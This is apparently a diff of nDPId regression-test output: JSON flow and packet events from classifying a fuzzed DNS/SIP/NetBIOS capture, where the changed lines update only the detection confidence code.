00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1120470284935,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470284935,"pkt":"ADBUADRWAODtAW69CABFAABEauIAAIARTHPAqAECwKgBAQrRADUAMPnuKv8AAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284935,"flow_last_seen":1120470284935,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2769,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284935,"flow_last_seen":1120470284935,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2769,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284936,"flow_last_seen":1120470284936,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470284936,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":117,"dst_port":2769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1120470284936,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470284936,"pkt":"AODtAW4FADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgB1CtEARyVzAP+AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1120470284937,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":47,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":47,"pkt_l4_len":13,"thread_ts_msec":1120470284937,"pkt":"ADBUADRWAODtAW69CABFAAAhauMAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470102883,"flow_last_seen":1120470102883,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470284937,"l3_proto":"ip4","src_ip":"192.86.1.2","dst_ip":"200.68.120.99","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470102883,"flow_last_seen":1120470102883,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470284937,"l3_proto":"ip4","src_ip":"192.86.1.2","dst_ip":"200.68.120.99","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470100319,"flow_last_seen":1120470100321,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470284937,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470098867,"flow_last_seen":1120470098867,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470284937,"l3_proto":"ip4","src_ip":"192.169.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470100319,"flow_last_seen":1120470100321,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470284937,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470098867,"flow_last_seen":1120470098867,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470284937,"l3_proto":"ip4","src_ip":"192.169.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470298331} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470284937,"pkt":"qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":358,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":9587,"global_ts_msec":1120470299325} @@ -638,82 +638,82 @@ 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1120470301328,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470301328,"pkt":"ADBUADRWAODtAW69CABFAABIauYAAIB\/TGvAqAECwKgBAQrSADUANCnz\/\/8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJYnliZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470303331,"flow_last_seen":1120470303331,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470303331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1120470303331,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470303331,"pkt":"ADBUADRWAODtAW69CABFBABIaucAAIARTGrAqAECwKgBAQrSADUANCnz\/\/8BAAABAAAAAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470303331,"flow_last_seen":1120470303331,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470303331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470303331,"flow_last_seen":1120470303331,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470303331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":361,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120470303562} 00416{"packet_event_id":1,"packet_event_name":"packet","packet_id":361,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470303331,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAFhOaugAAIARS2XAqAECwKgB\/wCJAIkAOlt2hSUBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470304312,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1120470304312,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470304312,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABO7ukAAIARS2TAqAECeKgB\/wCJAIkAOlt2hSUBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUKqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470304312,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470304312,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":363,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470305063} 00412{"packet_event_id":1,"packet_event_name":"packet","packet_id":363,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470304312,"pkt":"\/\/\/\/qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":1120470307336,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470307336,"pkt":"AFNUADRWAEjtAW69CABFAABIausAAIARTGbAqAECwKgBAQrSADUANCnz\/\/8BAABGAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470303331,"flow_last_seen":1120470307336,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470303331,"flow_last_seen":1120470307336,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470117343,"flow_last_seen":1120470117343,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"14.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470113337,"flow_last_seen":1120470121594,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120470049696,"flow_last_seen":1120470116279,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1120469540839,"flow_last_seen":1120470257655,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120470049696,"flow_last_seen":1120470116279,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1120469540839,"flow_last_seen":1120470257655,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315338,"flow_last_seen":1120470315338,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470315338,"l3_proto":"ip4","src_ip":"192.168.1.57","dst_ip":"192.168.1.1","src_port":2771,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1120470315338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470315338,"pkt":"ADBUADRWAODtAW69CABFAABEauwAAIARTGnAqAE5wKgBAQrTADUAMCcL\/eAAAAABAAAAAAAAATEBMAEw3TEyNwdpbi1hZGRyBGFycHcAAAwAAQ=="} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315338,"flow_last_seen":1120470315338,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470315338,"l3_proto":"ip4","src_ip":"192.168.1.57","dst_ip":"192.168.1.1","src_port":2771,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315338,"flow_last_seen":1120470315338,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470315338,"l3_proto":"ip4","src_ip":"192.168.1.57","dst_ip":"192.168.1.1","src_port":2771,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470315340,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1120470315340,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470315340,"pkt":"AODtAW68ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CtMARwmH\/eCAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQBhJxAACwlsb2NhbGhvc3QA"} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470315340,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 